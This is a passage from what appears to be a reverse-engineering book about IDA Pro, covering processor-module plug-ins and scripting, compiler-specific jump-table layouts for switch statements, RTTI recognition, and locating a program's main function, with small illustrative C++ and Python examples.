OUTDIR=$(IDA_SDK)bin/procs/

#(2) Postprocessing tool to add processor comment
MKIDP=$(IDA_SDK)bin/fix_proc
#MKIDP=$(IDA)bin/mkidp

#list out the object files in your project here
OBJS=ana.o emu.o ins.o out.o reg.o

BINARY=$(OUTDIR)$(PROC)$(PROC_EXT)

all: $(OUTDIR) $(BINARY)

clean:
	-@rm *.o
	-@rm $(BINARY)

$(OUTDIR):
	-@mkdir -p $(OUTDIR)

CC=g++
INC=-I$(IDA_SDK)include/

%.o: %.cpp
	$(CC) -c $(CFLAGS) $(INC) $< -o $@

LD=g++

ifeq "$(PLATFORM)" "MINGW32"
#(3) Windows processors require post processing
$(BINARY): $(OBJS)
	$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDALIB) $(EXTRALIBS)
	$(MKIDP) $(BINARY) "$(DESCRIPTION)"
else
$(BINARY): $(OBJS)
	$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDALIB) $(EXTRALIBS)
endif

#change python below to the name of your processor, make sure to add any
#additional files that your processor is dependent on
python.o: python.cpp
ana.o: ana.cpp
emu.o: emu.cpp
ins.o: ins.cpp
out.o: out.cpp
reg.o: reg.cpp

Listing 19-1: A makefile for the Python processor module

In addition to the minor changes to account for different suffixes and
default file locations for processors, the primary differences are the
definition of a description string (1), the specification of a utility to insert
description strings (2), and the addition of a build step to insert the
description string in Windows processor modules (3).

Customizing Existing Processors

Perhaps you are considering developing a processor module, but you notice

that an existing processor module does almost everything that you need. If

you have the source code for the processor module, then you might easily

modify it to suit your needs. On the other hand, if you don’t have the source

code, you might feel that you are out of luck. Fortunately, IDA offers a mech-

anism for customizing existing processors through the use of plug-ins. By

hooking the appropriate processor notifications, a plug-in module can inter-

cept calls to one or more of an existing processor’s analyzer, emulator, and

outputter stages. Potential applications for customizing a processor include

the following:

• Extending the capabilities of an existing processor to recognize
additional instructions

• Correcting broken behavior in an existing processor module (though it
is probably faster just to let Ilfak know you found a bug)

• Customizing the output of an existing processor module to suit your
particular needs


The following notification codes, declared in processor_t and discussed

in idp.hpp, may be hooked by plug-ins that want to intercept calls to various

stages of a processor:

custom_ana Behaves as u_ana; however, any new instructions must use a

cmd.itype value of 0x8000 or higher.

custom_emu Provides emulation for custom instruction types. You may

call (*ph.u_emu)() if you wish to invoke the processor’s existing emulator.

custom_out Generates output for custom instructions or provides cus-

tom output for existing instructions. You may call (*ph.u_out)() if you

wish to invoke the processor’s out function.

custom_outop Outputs a single custom operand. You may call

(*ph.u_outop)(op) if you wish to invoke the processor’s existing outop func-

tion.

custom_mnem Generates the mnemonic for a custom instruction.

The following code excerpts are from a plug-in that modifies the output

of the x86 processor module to replace the leave instruction with a cya

instruction and to swap the display order for instructions that have two oper-

ands (similar to the AT&T-style syntax):

int idaapi init(void) {

X if (ph.id != PLFM_386) return PLUGIN_SKIP;

Y hook_to_notification_point(HT_IDP, hook, NULL);

return PLUGIN_KEEP;

}

int idaapi hook(void *user_data, int notification_code, va_list va) {

switch (notification_code) {

case processor_t::custom_out: {

Z if (cmd.itype == NN_leave) { //intercept the leave instruction

[ MakeLine(SCOLOR_ON SCOLOR_INSN "cya" SCOLOR_OFF);

return 2;

}

else if (cmd.Op2.type != o_void) {

//intercept 2 operand instructions

op_t op1 = cmd.Op1;

op_t op2 = cmd.Op2;

cmd.Op1 = op2;

cmd.Op2 = op1;

\ (*ph.u_out)();

cmd.Op1 = op1;

cmd.Op2 = op2;

return 2;

}

return 0;

}

IDA Processor Modules 409

plugin_t PLUGIN = {

IDP_INTERFACE_VERSION,

] PLUGIN_PROC | PLUGIN_HIDE | PLUGIN_MOD, // plugin flags

init, // initialize

term, // terminate. this pointer may be NULL.

run, // invoke plugin

comment, // long comment about the plugin

help, // multiline help about the plugin

wanted_name, // the preferred short name of the plugin

wanted_hotkey // the preferred hotkey to run the plugin

};

The plug-in’s init function verifies that the current processor is the x86
processor X and then hooks processor notifications Y. In the callback hook
function, the plug-in processes the custom_out notification to recognize the
leave instruction Z and generates an alternative output line [. For two-operand
instructions, the hook function saves copies of the current command’s operands,
swaps them within the command, and then invokes the x86 processor’s u_out
function \ to handle all of the details of printing the line. Upon return, the
command’s operands are restored to their original order. Finally, the plug-in’s
flags ] specify that the plug-in should be loaded when a processor is loaded,
should not be listed on the Edit > Plugins menu, and modifies the database. The
following output shows the effects of the customizations performed by the plug-in:

.text:00401350 push ebp

^.text:00401351 mov 400000h, edx

.text:00401356 mov esp, ebp

^ .text:00401358 mov offset unk_402060, eax

^ .text:0040135D sub 0Ch, esp

.text:00401360 mov edx, [esp+8]

.text:00401364 mov eax, [esp+4]

^ .text:00401368 mov offset unk_402060, [esp]

.text:0040136F call sub_401320

_ .text:00401374 cya

.text:00401375 retn

You can observe the plug-in’s effects by noting that constants appear as

the first operand in four instructions ^ and that the cya instruction is used in

place of the leave instruction _.
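The save, swap, print, and restore sequence used by the hook can be modeled outside IDA. The following Python sketch is only an illustration: Insn, default_out, and custom_out are hypothetical stand-ins for cmd, the processor’s u_out function, and the custom_out handler, and none of them are SDK names.

```python
from contextlib import contextmanager
from dataclasses import dataclass


@dataclass
class Insn:
    """Hypothetical stand-in for IDA's current-instruction record (cmd)."""
    mnem: str
    op1: str = ""
    op2: str = ""          # an empty string plays the role of o_void


@contextmanager
def swapped_operands(insn):
    """Swap op1/op2 for the duration of the block, then always restore them."""
    insn.op1, insn.op2 = insn.op2, insn.op1
    try:
        yield insn
    finally:
        insn.op1, insn.op2 = insn.op2, insn.op1


def default_out(insn):
    """Stand-in for the processor's own output routine."""
    ops = ", ".join(op for op in (insn.op1, insn.op2) if op)
    return f"{insn.mnem} {ops}".strip()


def custom_out(insn):
    """Mimic the hook: rename leave, print two-operand instructions swapped."""
    if insn.mnem == "leave":
        return "cya"
    if insn.op2:
        with swapped_operands(insn) as swapped:
            return default_out(swapped)
    return default_out(insn)
```

Restoring the operands in a finally clause mirrors the reason the C++ hook swaps them back: the instruction record is shared state, and anything that runs later expects the operands in their original order.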

In Chapter 21, we will look at using a custom processor plug-in to aid in

the analysis of certain types of obfuscated binaries.

Processor Module Architecture

As you set about designing processor modules, one of the things you will

need to consider is whether the processor will be closely coupled with a spe-

cific loader or can be decoupled from all loaders. For example, consider the

x86 processor module. This module makes no assumptions about the type of


file that is being disassembled. Therefore, it is easily incorporated and used in

conjunction with a wide variety of loaders such as the PE, ELF, and Mach-O

loaders.

In a similar manner, loaders show versatility when they are capable of
handling a file format independently of the processor used with the file. For
example, the PE loader works equally well whether the file contains x86 code or
ARM code; the ELF loader works equally well whether the file contains x86, MIPS,
or SPARC code; and the Mach-O loader works fine whether the file contains PPC
or x86 code.

Real-world CPUs lend themselves to the creation of processor modules

that do not rely on a specific input file format. Virtual machine languages, on

the other hand, pose a much larger challenge. Whereas a wide variety of

loaders (such as ELF, a.out, and PE) may be used to load code for execution

on native hardware, a virtual machine typically acts as both a loader and a

CPU. The net result is that, for virtual machines, both the file format and the

underlying byte code are intimately related. One cannot exist without the

other. We bumped up against this limitation several times in the develop-

ment of the Python processor module. In many cases, it simply was not possi-

ble to generate more readable output without a deeper understanding of the

structure of the file being disassembled.

In order for the Python processor to have access to the additional infor-

mation that it requires, we could build a Python loader that configures the

database in a manner very specific to the Python processor so that the Python

processor knows exactly where to find the information it needs. In this sce-

nario, a significant amount of loader state data would need to pass from the

loader to the processor. One approach is to store such data in database net-

nodes, where that data could later be retrieved by the processor module.

An alternative approach is to build a loader that does nothing other than

recognize .pyc files and then tells the processor module that it should handle

all of the other loading tasks, in which case the processor will surely know

how to locate all of the information needed for disassembling the .pyc file.

IDA facilitates the construction of tightly coupled loaders and processor

modules by allowing a loader to defer all loading operations to an associated

processor module. This is how the SDK’s included Java loader and Java pro-

cessor are constructed. In order for a loader to defer loading to the proces-

sor module, the loader should first accept a file by returning a file type of

f_LOADER (defined in ida.hpp). If the loader is selected by the user, the loader’s

load_file function should ensure that the proper processor type has been

specified by calling set_processor_type (idp.hpp) if necessary before sending a

loader-notification message to the processor. To build a tightly coupled

Python loader/processor combination, we might build a loader with the fol-

lowing load_file function:

void idaapi load_file(linput_t *li, ushort neflag, const char *) {
   if (ph.id != PLFM_PYTHON) { //shared processor ID
      set_processor_type("python", SETPROC_ALL|SETPROC_FATAL);
   }
   //tell the python processor module to do the loading for us
   //by sending the processor_t::loader notification message
   if (ph.notify(processor_t::loader, li, neflag)) {
      error("Python processor/loader failed");
   }
}

When the processor module receives the loader notification, it takes

responsibility for mapping the input file into the database and making sure

that it has access to any information that will be required in any of the ana,

emu, and out stages. A Python loader and processor combination that operates

in this manner is available on the book’s companion website.

Scripting a Processor Module

Introduced in IDA 5.7, the capability to create processor modules using one
of IDA’s scripting languages somewhat simplifies the creation of processor
modules. If nothing else, it completely eliminates the build phase of module
creation. Elias Bachaalany of Hex-Rays introduced scripted processor modules
in a post on Hex Blog,⁵ and IDA’s EFI bytecode processor module is
implemented as a Python script (see <IDADIR>/procs/ebc.py). Note that while
the Hex Blog post serves as useful background, the actual API used for scripting
processor modules seems to have evolved. The best place for you to start
development of your own processor module script is with the template module
that ships with the SDK (see <SDKDIR>/module/script/proctemplate.py).
Among other things, this template enumerates all of the fields required in
a Python processor module.

Scripted processor modules make use of nearly all elements discussed
previously. Understanding these elements will ease your transition to scripted
modules. Additionally, the three Python processor modules that currently
ship with IDA (as of IDA 6.1) serve as excellent examples from which to
begin your own module development. The structure of these modules
is a bit easier to understand than the C++ examples that ship with the SDK,
which span several files and require you to correctly configure a build
environment.

From a very high level, two things are required to implement a processor

module in Python:

- Define a subclass of idaapi.processor_t, providing implementations for all
  required processor module functions such as emu, ana, out, and outop.

- Define a PROCESSOR_ENTRY function (not a member of your subclass) that
  returns an instance of your processor class.

The following listing begins to outline some of the required elements:

import idaapi   # binds the name idaapi used in the class statement below
from idaapi import *

class demo_processor_t(idaapi.processor_t):
    # Initialize required processor data fields including id and
    # assembler and many others. The assembler field is a dictionary
    # containing keys for all of the fields of an asm_t. A list of
    # instructions named instruc is also required. Each item in the list
    # is a two-element dictionary containing name and feature keys.

    # Also define functions required by processor_t such as those below.
    def ana(self):
        pass  # analyzer behavior

    def emu(self):
        pass  # emulator behavior

    def out(self):
        pass  # outputter behavior

    def outop(self):
        pass  # outop behavior

# define the processor entry point function which instantiates
# and returns an instance of processor_t
def PROCESSOR_ENTRY():
    return demo_processor_t()

5. See http://www.hexblog.com/?p=116.

A valid Python processor module contains far more fields and functions

than shown above, essentially mirroring the fields required in any processor

module implemented in C++. Once your script is complete, installation of

your module is accomplished by copying your script to <IDADIR>/procs.
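To make the shape of the instruc list more concrete, here is a minimal sketch that runs outside IDA. It is not the SDK template: processor_stub is a hypothetical placeholder for idaapi.processor_t, the instruction names are invented, and the CF_* values are stand-ins defined locally for illustration (a real module takes them from idaapi).

```python
# Stand-in feature flags for illustration only; a real module uses the
# CF_* constants supplied by idaapi instead of defining its own.
CF_STOP = 0x1
CF_USE1 = 0x100


class processor_stub(object):
    """Hypothetical placeholder for idaapi.processor_t (lets this run outside IDA)."""


class demo_processor_t(processor_stub):
    # Instruction table: one dictionary per instruction, each holding
    # exactly a name key and a feature key.
    instruc = [
        {"name": "nop",  "feature": 0},
        {"name": "push", "feature": CF_USE1},
        {"name": "ret",  "feature": CF_STOP},
    ]

    def ana(self):
        return 0  # placeholder analyzer

    def emu(self):
        return 0  # placeholder emulator

    def out(self):
        return 0  # placeholder outputter

    def outop(self):
        return 0  # placeholder operand outputter


def PROCESSOR_ENTRY():
    """Module-level entry point that hands back the processor object."""
    return demo_processor_t()


def check_shape(proc):
    """Verify that the pieces named in the text are present on proc."""
    for entry in proc.instruc:
        if set(entry) != {"name", "feature"}:
            return False
    required = ("ana", "emu", "out", "outop")
    return all(callable(getattr(proc, name, None)) for name in required)
```

A check such as check_shape is not part of IDA; it is simply a quick way to catch a missing key or function before copying a script into <IDADIR>/procs.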

Summary

As the most complex of IDA’s modular extensions, processor modules take

time to learn and even more time to create, although the use of scripting can

ease this pain to some extent. However, if you are in a niche reverse engineer-

ing market, or you simply like to be on the leading edge of the reverse engi-

neering community, you will almost certainly find yourself with the need to

develop a processor module at some point. We cannot emphasize enough

the role that patience and trial and error play in any processor-development

situation. The hard work more than pays off when you are able to reuse your

processor module with each new binary you collect.

With the end of this chapter, we conclude our discussion of IDA’s exten-

sibility features. Over the course of the next several chapters, we will discuss

many of the ways IDA is used in real-world scenarios and look at how users

have leveraged IDA extensions to perform a variety of interesting analysis

tasks.

PART V

REAL-WORLD APPLICATIONS


COMPILER PERSONALITIES

At this point, if we have done our job

properly, you now possess the essential skills

to use IDA effectively and, more important,

to bend it to your will. The next step, young

grasshopper, is to learn to react to the ninja stars

that binaries (as opposed to IDA) will throw at you.

Depending on your motives for staring at assembly language, you may be

very familiar with what you are looking at, or you may never know what you

are going to be faced with. If you happen to spend all of your time examining

code that was compiled using gcc on a Linux platform, you may become quite

familiar with the style of code that it generates. On the other hand, if some-

one dropped a debug version of a program compiled using Microsoft Visual

C++ (VC++) in your lap, you might be completely baffled. Malware analysts in

particular are faced with a wide variety of code to examine. Setting aside the

topic of obfuscation for the moment, malware analysts are likely to see code

created using Visual Basic, Delphi, and Visual C/C++; machine language

blobs embedded within documents; and more all in the same afternoon.


In this chapter we will take a brief look at some of the ways that compilers

differ as viewed through the IDA looking glass. The intent is not to delve

into why compilers differ; rather, we hope to cover some of the ways that those

differences manifest themselves in disassembly listings and how you may

resolve those differences. Among other things, the compiler and associated

options used to build a particular piece of software constitute one data point

in profiling the author of that software.

While a wide variety of compilers are available for a wide variety of lan-

guages, in this chapter we will primarily utilize compiled C code for our

examples, as a large number of C compilers are available for a large number

of platforms.

Jump Tables and Switch Statements

The C switch statement is a frequent target for compiler optimizations. The

goal of these optimizations is to match the switch variable to a valid case label

in the most efficient manner possible. The means by which this is achieved

typically depends on the nature of the switch statement’s case labels. When

the case labels are widely spread, as in the following example, most compilers

generate code to perform a binary search¹ to match the switch variable against

one of the cases.

switch (value) {

case 1:

//code executed when value == 1

break;

case 211:

//code executed when value == 211

break;

case 295:

//code executed when value == 295

break;

case 462:

//code executed when value == 462

break;

case 1093:

//code executed when value == 1093

break;

case 1839:

//code executed when value == 1839

break;

}
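As a rough model of the binary search strategy, the following Python sketch matches a value against the sorted case labels from the example and counts how many labels it had to examine. A compiler emits a fixed tree of compare and conditional jump instructions rather than a loop, so treat this only as an illustration of the search order; the function name match_case is hypothetical.

```python
CASES = [1, 211, 295, 462, 1093, 1839]   # sorted case labels from the example


def match_case(value, cases=CASES):
    """Return (index of matching case or None, number of labels examined)."""
    lo, hi = 0, len(cases) - 1
    probes = 0
    while lo <= hi:
        mid = (lo + hi) // 2
        probes += 1
        if value == cases[mid]:
            return mid, probes
        if value < cases[mid]:
            hi = mid - 1        # continue in the lower half
        else:
            lo = mid + 1        # continue in the upper half
    return None, probes         # no label matched: the default case
```

With six labels, no value requires more than three probes, compared with up to six for a linear chain of comparisons.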

When case labels are closely clustered, preferably sequentially as shown

here, compilers generally resolve the switch variable by performing a table

lookup² to match the switch variable to the address of its associated case.

1. For you algorithmic analysis fans, this means that the switch variable is matched after at most

log₂ N operations, where N is the number of cases contained in the switch statement.

2. Again for those analyzing algorithms at home, the use of a table lookup allows the target case

to be found in a single operation, which you may recall from your algorithms class is also called

constant time or O(1).


switch (value) {

case 1:

//code executed when value == 1

break;

case 2:

//code executed when value == 2

break;

case 3:

//code executed when value == 3

break;

case 4:

//code executed when value == 4

break;

case 5:

//code executed when value == 5

break;

case 6:

//code executed when value == 6

break;

}

A compiled example of a switch statement that matches the switch variable

against the consecutive cases 1 through 12 is shown here:

.text:00401155 mov edx, [ebp+arg_0]

X .text:00401158 cmp edx, 0Ch ; switch 13 cases

.text:0040115B ja \loc_4011F1 ; default

.text:0040115B ; jumptable 00401161 case 0

.text:00401161 jmp ds:off_401168[edx*4] ; switch jump

.text:00401161 ; ---------------------------------------------------------------

Y .text:00401168 off_401168 dd offset [loc_4011F1 ; DATA XREF: sub_401150+11↑r

.text:00401168 dd offset loc_40119C ; jump table for switch statement

.text:00401168 dd offset loc_4011A1

.text:00401168 dd offset loc_4011A6

.text:00401168 dd offset loc_4011AB

.text:00401168 dd offset loc_4011B3

.text:00401168 dd offset loc_4011BB

.text:00401168 dd offset loc_4011C3

.text:00401168 dd offset loc_4011CB

.text:00401168 dd offset loc_4011D3

.text:00401168 dd offset loc_4011DB

.text:00401168 dd offset loc_4011E3

.text:00401168 dd offset loc_4011EB

.text:0040119C ; ---------------------------------------------------------------

.text:0040119C

.text:0040119C loc_40119C: ; CODE XREF: sub_401150+11↑j

.text:0040119C ; DATA XREF: sub_401150:off_401168↑o

Z .text:0040119C mov eax, [ebp+arg_4] ; jumptable 00401161 case 1


This example was compiled using the Borland command-line compiler,
whose output IDA understands well. The comments, which IDA inserted during the
analysis phase, demonstrate that IDA has a clear understanding that this is a
switch statement. In this example we note that IDA recognizes the switch
test X, the jump table Y, and individual cases by value Z within the code.

As a side note on the use of jump tables to resolve switch cases, note

that the table in the previous example contains 13 entries, while the switch

statement is known to test cases 1 through 12 only. In this case, the compiler

elected to include an entry for case 0 rather than treating 0 as a special case.

The destination for case 0 [ is the same as the destination for every other

value outside the range of 1 to 12 \.

A final implementation note concerns the nature of the test performed

on the switch variable. For readers less familiar with the x86 instruction set,

the test X and the associated jump in the succeeding line may appear only

to exclude values larger than 12 while failing to account for negative values.

If true, this could be disastrous, as using a negative index into the jump table

might lead to unintended consequences. Fortunately, the ja (jump above)

instruction treats comparisons as if they were performed on unsigned values;

thus -1 (0xFFFFFFFF) would be seen as 4294967295, which is much larger than 12

and therefore excluded from the valid range for indexing the jump table.
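The two implementation notes above, the dummy slot for case 0 and the unsigned range check, can be modeled in a few lines of Python. This is a sketch of the logic only: the handler names are invented labels, and masking with 0xFFFFFFFF is how the sketch imitates a 32-bit register being compared as an unsigned value.

```python
DEFAULT = "default"

# 13 slots: index 0 is the dummy entry that points at the default block,
# indexes 1 through 12 point at the handlers for cases 1 through 12.
BORLAND_TABLE = [DEFAULT] + [f"case_{n}" for n in range(1, 13)]


def borland_dispatch(value):
    """Model of: cmp edx, 0Ch / ja default / jmp ds:off_401168[edx*4]."""
    index = value & 0xFFFFFFFF      # view the register contents as unsigned
    if index > 0x0C:                # ja: unsigned "above" comparison
        return DEFAULT
    return BORLAND_TABLE[index]
```

Calling borland_dispatch(-1) takes the default path because -1 is seen as 4294967295, so a single comparison rejects both values above 12 and all negative values.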

The same source code compiled using Microsoft Visual C++ results in the

disassembly listing shown here:

.text:004013D5 mov ecx, [ebp+var_8]

.text:004013D8 Xsub ecx, 1

.text:004013DB mov [ebp+var_8], ecx

.text:004013DE cmp [ebp+var_8], Y0Bh ; switch 12 cases

.text:004013E2 ja loc_40146E ; jumptable 004013EB default case

.text:004013E8 mov edx, [ebp+var_8]

.text:004013EB jmp ds:off_401478[edx*4] ; switch jump

.text:004013F2

[.text:004013F2 loc_4013F2: ; DATA XREF: .text:off_401478↓o

.text:004013F2 mov eax, [ebp+arg_4] ; jumptable 004013EB \case 0

... ; REMAINDER OF FUNCTION EXCLUDED FOR BREVITY

.text:00401477 retn

.text:00401477 sub_4013B0 endp

.text:00401477 ; -------------------------------------------------------------

Z.text:00401478 off_401478 dd offset [loc_4013F2 ; DATA XREF: sub_4013B0+3B↑r

.text:00401478 dd offset loc_4013FA ; jump table for switch statement

.text:00401478 dd offset loc_401402

.text:00401478 dd offset loc_40140A

.text:00401478 dd offset loc_401415

.text:00401478 dd offset loc_401420

.text:00401478 dd offset loc_40142B

.text:00401478 dd offset loc_401436

.text:00401478 dd offset loc_401441

.text:00401478 dd offset loc_40144C

.text:00401478 dd offset loc_401458

.text:00401478 dd offset loc_401464


Several differences are apparent when comparing this code with the

code generated by the Borland compiler. One obvious difference is that the

jump table has been relocated to space immediately following the function

containing the switch statement (as opposed to being embedded within the

function itself in the case of the Borland code). Other than providing a

cleaner separation of code and data, relocating the jump table in this man-

ner has little effect on the behavior of the program. Despite the different lay-

out of the code, IDA remains capable of annotating the key features of the

switch statement, including the number of cases and the code blocks associ-

ated with each case.

A few of the implementation details of the switch statement include the

fact that the switch variable (var_8 in this case) is decremented X to shift

the range of valid values to 0 through 11 Y, allowing the variable to be

used directly as an index into the jump table Z without the need to create

a dummy slot for the unused case 0. As a result, the first entry (or zero index

entry) [ in the jump table actually refers to the code for switch case 1.
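For comparison with the Borland layout, the Visual C++ approach of decrementing the switch variable before the range check might be modeled as follows. As before, this is only a sketch with invented handler labels, and the 0xFFFFFFFF mask imitates 32-bit register wraparound.

```python
# 12 slots and no dummy entry: index 0 holds the handler for case 1.
MSVC_TABLE = [f"case_{n}" for n in range(1, 13)]


def msvc_dispatch(value):
    """Model of: sub ecx, 1 / cmp [ebp+var_8], 0Bh / ja default / jmp table[edx*4]."""
    index = (value - 1) & 0xFFFFFFFF   # decrement, wrapping like a 32-bit register
    if index > 0x0B:                   # unsigned comparison against 11
        return "default"
    return MSVC_TABLE[index]
```

Note that a switch value of 0 wraps around to 0xFFFFFFFF after the decrement, which is why it lands in the default case without needing a table slot of its own.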

Rounding out our comparison of switch statements is the following code

generated by gcc:

.text:004011FA Xcmp [ebp+arg_0], 0Ch ; switch 13 cases

.text:004011FE ja Zloc_40129D ; jumptable 00401210 case 0

.text:00401204 mov eax, [ebp+arg_0]

.text:00401207 shl eax, 2

.text:0040120A \mov Yeax, ds:off_402010[eax]

.text:00401210 \jmp eax ; switch jump

.text:00401212

.text:00401212 [loc_401212: ; DATA XREF: .rdata:off_402010↓o

.text:00401212 mov eax, [ebp+arg_4] ; jumptable 00401210 case 1

... ; REMAINDER OF .text SECTION EXCLUDED FOR BREVITY

Y.rdata:00402010 off_402010 dd offset Zloc_40129D ; DATA XREF: sub_4011ED+1D↑r

.rdata:00402010 dd offset [loc_401212 ; jump table for switch statement

.rdata:00402010 dd offset loc_40121D

.rdata:00402010 dd offset loc_401225

.rdata:00402010 dd offset loc_40122D

.rdata:00402010 dd offset loc_40123C

.rdata:00402010 dd offset loc_40124B

.rdata:00402010 dd offset loc_40125A

.rdata:00402010 dd offset loc_401265

.rdata:00402010 dd offset loc_401270

.rdata:00402010 dd offset loc_40127B

.rdata:00402010 dd offset loc_401287

.rdata:00402010 dd offset loc_401293

This code bears some similarities to the Borland code as seen by the

comparison to 12 X, the jump table Y that contains 13 entries, and the use

of a pointer to the default case Z in the case 0 slot of the jump table. As in

the Borland code, the address for the case 1 handler [ can be found at

index 1 into the jump table. Notable differences between the gcc code and

previous examples include a different style of executing the jump \ and the

fact that the jump table is stored in the read-only data (.rdata) section of the


binary, providing a logical separation between the code associated with the

switch statement and the data required to implement the switch statement.

As in the other two examples, IDA is able to locate and annotate the key ele-

ments of the switch statement.

One of the points we are making here is that there is no single correct

way to compile source to assembly. Familiarity with code generated by a spe-

cific compiler in no way guarantees that you will recognize high-level con-

structs compiled using an entirely different compiler (or even different

versions of the same compiler family). More important, do not assume that

something is not a switch statement simply because IDA fails to add comments

to that effect. Like you, IDA is more familiar with the output of some com-

pilers than others. Rather than relying entirely on IDA’s analysis capabilities

to recognize commonly used code and data constructs, you should always

be prepared to utilize your own skills—your familiarity with a given assembly

language, your knowledge of compilers, and your research skills—to properly

interpret a disassembly.
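When IDA does not annotate a suspected jump table, one way to apply your own skills is to decode the table by hand. The sketch below assumes a 32-bit little-endian x86 binary and that you have already extracted the raw table bytes by some other means; the helper names are hypothetical, and only Python’s standard struct module is used.

```python
import struct


def read_jump_table(data, count):
    """Decode count little-endian 32-bit code addresses from raw table bytes."""
    if len(data) < count * 4:
        raise ValueError("not enough bytes for the requested number of entries")
    return list(struct.unpack_from(f"<{count}I", data))


def entry_address(table_base, index):
    """Address of a table slot: base + index * 4 (the shl eax, 2 in the gcc code)."""
    return table_base + (index << 2)
```

For the gcc example, entry_address(0x402010, 1) yields 0x402014, the slot that holds the address of the case 1 handler.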

RTTI Implementations

In Chapter 8 we discussed C++ Runtime Type Identification (RTTI) and

the fact that no standard exists for the manner in which RTTI is implemented

by a compiler. Automatic recognition of RTTI-related constructs within a

binary is another area in which IDA’s capabilities vary across compilers. Not

surprisingly, IDA’s capabilities in this area are strongest with binaries compiled

using Borland compilers. Readers interested in automated recognition of

Microsoft RTTI data structures may want to try Igor Skochinsky’s IDC script

available at The IDA Palace³ or the Class Informer plug-in by Sirmabus,⁴

which will be discussed further in Chapter 23.

A simple strategy for understanding how a specific compiler embeds type

information for C++ classes is to write a basic program that makes use of

classes containing virtual functions. After compiling the program, you can

load the resulting executable into IDA and search for instances of strings

that contain the names of classes used in the program. Regardless of the

compiler used to build a binary, one thing that RTTI data structures have in

common is that they all contain a pointer to a string containing the name

of the class that they represent. Using data cross-references, it should be

possible to locate a pointer to one such string, thus locating candidate RTTI

data structures. The last step is to link a candidate RTTI structure back to

the associated class’s vtable, which is best accomplished by following data

cross-references backward from a candidate RTTI structure until a table of

function pointers (the vtable) is reached.
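The first two steps of this strategy, finding a class-name string and then finding pointers to it, can be sketched over a raw memory image. The code below makes several simplifying assumptions that will not hold for every compiler: the name is stored as plain ASCII, pointers are 32-bit little-endian values aligned on 4-byte boundaries, and a pointer refers to the first byte of the string. The function names are hypothetical.

```python
import struct


def find_pointers_to(image, base, target_va):
    """Return addresses of aligned little-endian dwords equal to target_va."""
    needle = struct.pack("<I", target_va)
    hits = []
    pos = image.find(needle)
    while pos != -1:
        if pos % 4 == 0:                 # keep only naturally aligned matches
            hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits


def find_class_name_refs(image, base, class_name):
    """Locate class_name in image, then every pointer to that location."""
    offset = image.find(class_name.encode("ascii"))
    if offset == -1:
        return None, []
    name_va = base + offset
    return name_va, find_pointers_to(image, base, name_va)
```

Each address returned is a candidate member of an RTTI structure; inside IDA the same job is done by following data cross-references from the string, and the final step of walking back to the vtable still has to be carried out by hand.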

3. See http://old.idapalace.net/idc/ms_rtti.zip.

4. See http://www.openrce.org/blog/browse/Sirmabus.


Locating main

If you were fortunate enough to have source code available for a C/C++ pro-

gram that you wanted to analyze, a good place to begin your analysis might

be the main function, as this is where execution notionally begins. When faced

with analyzing a binary, this is not a bad strategy to follow. However, as we

know, it is complicated by the fact that compilers/linkers (and the use of

libraries) add additional code that executes before main is reached. Thus it

would often be incorrect to assume that the entry point of a binary corre-

sponds to the main function written by the program’s author.

In fact, the notion that all programs have a main function is a C/C++

compiler convention rather than a hard-and-fast rule for writing programs. If

you have ever written a Windows GUI application, then you may be familiar

with the WinMain variation on main. Once you step away from C/C++, you will

find that other languages use other names for their primary entry-point

function. Regardless of what it may be called, we will refer to this function

generically as the main function.

Chapter 12 covered the concept of IDA signature files, their generation,

and their application. IDA utilizes special startup signatures to attempt to

identify a program’s main function. When IDA is able to match a binary’s

startup sequence against one of the startup sequences in its signature files,

IDA can locate a program’s main function based on its understanding of the

behavior of the matched startup routine. This works great until IDA fails to

match the startup sequence in a binary to any of its known signatures. In gen-

eral, a program’s startup code is closely tied to both the compiler used to

generate the code and the platform for which the code was built.

Recall from Chapter 12 that startup signatures are grouped together

and stored in signature files specific to binary file types. For example, startup

signatures for use with the PE loader are stored in pe.sig, while startup sig-

natures for use with the MS-DOS loader are stored in exe.sig. The existence of

a signature file for a given binary file type does not guarantee that IDA will be

able to identify a program’s main function 100 percent of the time. There are

too many compilers, and startup sequences are too much of a moving target

for IDA to ship with every possible signature.

For many file types, such as ELF and Mach-O, IDA does not include any

startup signatures at all. The net result is that IDA can’t use signatures to

locate a main function within an ELF binary (though the function will be found

if it is named main).

The point of this discussion is to prepare you for the fact that, on occasion,

you will be on your own when it comes to locating the main function of a pro-

gram. In such cases it is useful to have some strategies for understanding

how the program itself prepares for the call to main. As an example, consider

a binary that has been obfuscated to some degree. In this case, IDA will cer-

tainly fail to match a startup signature because the startup routine itself has

been obfuscated. If you manage to de-obfuscate the binary somehow (the

topic of Chapter 21), you will probably need to locate not only main on your

own but the original start routine as well.


For C and C++ programs with a traditional main function,⁵ one of the
responsibilities of the startup code is to set up the stack arguments required
by main: the integer argc (a count of the number of command-line arguments),
the character pointer array argv (an array of pointers to strings containing the
command-line arguments), and the character pointer array envp (an array
of pointers to strings containing the environment variables that were set at
program invocation). The following excerpt from a FreeBSD 8.0 dynamically
linked, stripped binary demonstrates how gcc-generated startup code calls
main on a FreeBSD system:

.text:08048365 mov dword ptr [esp], offset _term_proc ; func

.text:0804836C Ycall _atexit

.text:08048371 Zcall _init_proc

.text:08048376 lea eax, [ebp+arg_0]

.text:08048379 mov [esp+8], esi

.text:0804837D mov [esp+4], eax

.text:08048381 mov [esp], ebx

.text:08048384 Xcall sub_8048400

.text:08048389 \mov [esp], eax ; status

.text:0804838C [call _exit

In this case, the call to sub_8048400 X turns out to be the call to main.

This code is typical of many startup sequences in that there are calls to ini-

tialization functions (_atexit Y and _init_proc Z) preceding the call to main

and a call to _exit [ following the return from main. The call to _exit ensures

that the program terminates cleanly in the event that main performs a return

rather than calling _exit itself. Note that the parameter passed to _exit \ is

the value returned by main in EAX; thus the exit code of the program is the

return value of main.
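The observation that the return value of main is handed straight to _exit suggests a simple search pattern: a call, followed by a store of EAX to the top of the stack, followed by a call to exit. The sketch below applies that pattern to instructions represented as (mnemonic, operands) tuples. Both the representation and the function name are assumptions made for illustration, and the pattern only helps when the exit function still has a recognizable name.

```python
def find_main_call(insns):
    """Return the target of the call whose result is passed to exit, or None.

    insns is a list of (mnemonic, operands) tuples in address order.
    """
    for i in range(len(insns) - 2):
        (m0, o0), (m1, o1), (m2, o2) = insns[i:i + 3]
        stores_eax = m1 == "mov" and o1.replace(" ", "") == "[esp],eax"
        calls_exit = m2 == "call" and o2.lstrip("_") == "exit"
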